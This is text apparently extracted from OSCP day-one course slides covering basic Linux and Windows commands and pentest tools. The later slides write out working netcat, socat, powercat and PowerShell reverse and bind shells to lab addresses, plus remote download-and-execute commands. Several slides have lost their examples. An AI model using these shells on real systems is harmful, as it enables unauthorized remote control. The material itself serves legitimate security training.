OSCP DAY1

Table of Contents
• Command Line Fun
• Practical Tools
BASIC LINUX & WINDOWS
COMMANDS
Linux Commands
The Shell – Bash
The shell, or the terminal is a really useful tool. Bash is the standard shell on most Linux distros.

• Navigating
pwd - Print working directory
cd - Change directory
cd ~ - Change directory to your home directory
Linux Commands
• Looking at files
ls - List files in directory
ls -ltr - Sort list by last modified. -time -reverse
file - Show info about file. What type of file it is. If it is a binary or text file for example.
cat - Output content of file.
more - Output file but just little bit at a time. less is better.
Linux Commands
• A little bit of everything
history - Show commands history
sudo
List what rights the sudo user has.
sudo -l

Sudo config file is usually /etc/sudoers

Linux Commands
• Working with files
touch - Create a new file.
cp - Copy
mkdir - Make directory.

rm - Remove file
Linux Commands
• Find
Find is slower than locate but a lot more thorough. You can search for files recursively and with regex
and a lot of other features.
Linux Commands
• Locate
Locate is really fast because it relies on an internal database. So in order to have it updated you need to
run:

Then you can easily find stuff like this:

Linux Commands
• Which
Outputs the path of the binary that you are looking for. It searches through the directories that are
defined in your $PATH variable.
Linux Commands
• filters
There are certain programs that are especially useful to use together with pipes. They can also be used
as stand-alone programs but you will often see them together with pipes.
sort

uniq

grep
head
tail
tr
Linux Commands
• cut
Cut by column
This is a useful command to cut in text.
Let's say that we have the following text, and we want to cut out the ip-address.

-d stands for delimiter. and -f for field.

Linux Commands
• tr – Translate
Transform all letter into capital letters

Example
Remove character
cat file.txt | tr –d “.”
Linux Commands
• awk
So awk is an advanced tool for editing text-files. It is its own programming language to it can become
quite complex. Awk iterates over the whole file line by line.
This is the basic structure of an awk command
awk '/search_pattern/ { action_to_take_on_matches; another_action; }' file_to_parse

The search pattern takes regex.

You can exclude the search portion or the action portion.
This just prints every line of the file.
Linux Commands
• awk
Filtering out specific ip-address:

Now we want to print out the fourth column of that file, we can just pipe this to cut, but we can also use
awk for it, like this:

We can use the -F flag to add a custom delimiter.

Linux Commands
• Permissions

Shows all the files and directories and their permission settings.

Here we have 10 letters in the beginning. The first one d shows that it is a directory.
The next three letters are for read, w for write and x for execute. The first three belong to the owner,
the second three to the group, and the last three to all users.

→ https://linuxjourney.com/lesson/file-permissions
Windows Commands
• Show hidden files

• Print out file content, like cat

• grep files
Windows Commands
• Processes
List processes
tracert

Kill a process
taskkill /PID 1532 /F
Windows Commands
• Users
PRACTICAL TOOLS
Practical Tools
• Netcat
• Socat
• PowerShell and Powercat
• Tcpdump
Practical Tools - netcat
• netcat
Listening on TCP/UDP Port
Windows → nc.exe –nlvp 4444
Linux → nc –nlvp 4444
Practical Tools - netcat
• netcat
Netcat Bind Shell
Practical Tools - netcat
• netcat
Netcat reverse Shell
Practical Tools - netcat
• Transferring Files with Netcat
C:\Users\offsec> nc -nlvp 4444 > incoming.exe
kali@kali:~$ nc -nv 10.11.0.22 4444 < /usr/share/windows-resources/binaries/wget.exe
Practical Tools - socat
• Netcat vs Socat
First, let’s connect to a remote server on port 80 using both Netcat and socat:
kali@kali:~$ nc <remote server's ip address> 80
kali@kali:~$ socat - TCP4:<remote server's ip address>:80

kali@kali:~$ sudo nc -lvp localhost 443

kali@kali:~$ sudo socat TCP4-LISTEN:443 STDOUT
Practical Tools - socat
• Socat File Transfers
kali@kali:~$ sudo socat TCP4-LISTEN:443,fork file:secret_passwords.txt

C:\Users\offsec> socat TCP4:10.11.0.4:443 file:received_secret_passwords.txt,create

C:\Users\offsec> type received_secret_passwords.txt
"try harder!!!"
Practical Tools - socat
• Socat Reverse Shells
C:\Users\offsec> socat -d -d TCP4-LISTEN:443 STDOUT
kali@kali:~$ socat TCP4:10.11.0.22:443 EXEC:/bin/bash
Practical Tools - PowerShell and Powercat
• Unrestricted
PS C:\WINDOWS\system32> Set-ExecutionPolicy Unrestricted
PS C:\WINDOWS\system32> Get-ExecutionPolicy
Practical Tools - PowerShell and Powercat
• PowerShell File Transfers
C:\Users\offsec> powershell -c "(new-object
System.Net.WebClient).DownloadFile('http://10.11.0.4/wget.exe','C:\Users\offsec\Desktop\wget.exe')"
Practical Tools - PowerShell and Powercat
• PowerShell Reverse Shells
Using nc to set up a listener in order to receive a reverse shell
kali@kali:~$ sudo nc -lnvp 443
Practical Tools - PowerShell and Powercat
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('10.11.0.4',443);$stream =
$client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i =$stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data
= (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-
String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte =
([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$clien
t.Close()"
Practical Tools - PowerShell and Powercat
• PowerShell Bind Shells
powershell -c "$listener = New-Object
System.Net.Sockets.TcpListener('0.0.0.0',443);$listener.start();$client =
$listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes =
0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data =
(New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,
$i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' +
(pwd).Path + '> ';$sendbyte =
([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyt
e.Length);$stream.Flush()};$client.Close();$listener.Stop()"
Practical Tools - PowerShell and Powercat
• PowerShell Bind Shells
kali@kali:~$ nc -nv 10.11.0.22 443
Practical Tools - PowerShell and Powercat
• Powercat
Powercat can be installed in Kali with apt install powercat, which will place the script in
/usr/share/windows-resources/powercat.
Practical Tools - PowerShell and Powercat
• Powercat
Loading a remote PowerShell script using iex
PS C:\Users\Offsec> iex (New-Object
System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/m
aster/powercat.ps1')
Practical Tools - PowerShell and Powercat
• Powercat File Transfers
kali@kali:~$ sudo nc -lnvp 443 > receiving_powercat.ps1
PS C:\Users\Offsec> powercat -c 10.11.0.4 -p 443 -i C:\Users\Offsec\powercat.ps1
Practical Tools - PowerShell and Powercat
• Powercat Reverse Shells
kali@kali:~$ sudo nc -lvp 443
PS C:\Users\offsec> powercat -c 10.11.0.4 -p 443 -e cmd.exe
Practical Tools - PowerShell and Powercat
• Powercat Bind Shells
Using powercat to set up a bind shell
PS C:\Users\offsec> powercat -l -p 443 -e cmd.exe

Using nc to connect to a bind shell created by powercat

kali@kali:~$ nc 10.11.0.22 443
Practical Tools - PowerShell and Powercat
• Powercat Stand-Alone Payloads
Creating and executing a stand-alone payload
PS C:\Users\offsec> powercat -c 10.11.0.4 -p 443 -e cmd.exe -g > reverseshell.ps1

Receiving a stand-alone reverse shell

kali@kali:~$ sudo nc -lnvp 443

Executing an stand-alone payload using PowerShell

PS C:\Users\offsec> powershell.exe ./reverseshell.ps1
Practical Tools - Tcpdump
• tcpdump
Using tcpdump to read packet capture
kali@kali:~$ sudo tcpdump -i eth0 –w password_cracking_filtered.pcap
kali@kali:~$ sudo tcpdump -r password_cracking_filtered.pcap

Using tcpdump to read and filter the packet capture

kali@kali:~$ sudo tcpdump -n -r password_cracking_filtered.pcap | awk -F" " '{print $3}' | sort | uniq -c
| head
Practical Tools - tcpdump
• tcpdump
Using tcpdump filters
kali@kali:~$ sudo tcpdump -n src host 172.16.40.10 -r password_cracking_filtered.pcap
kali@kali:~$ sudo tcpdump -n dst host 172.16.40.10 -r password_cracking_filtered.pcap
kali@kali:~$ sudo tcpdump -n port 81 -r password_cracking_filtered.pcap
Practical Tools - Tcpdump
• tcpdump
Using tcpdump to read the packet capture in hex/ascii output
kali@kali:~$ sudo tcpdump -nX -r password_cracking_filtered.pcap

Using tcpdump with some advanced filtering

kali@kali:~$ sudo tcpdump -A -n 'tcp[13] = 24' -r password_cracking_filtered.pcap
END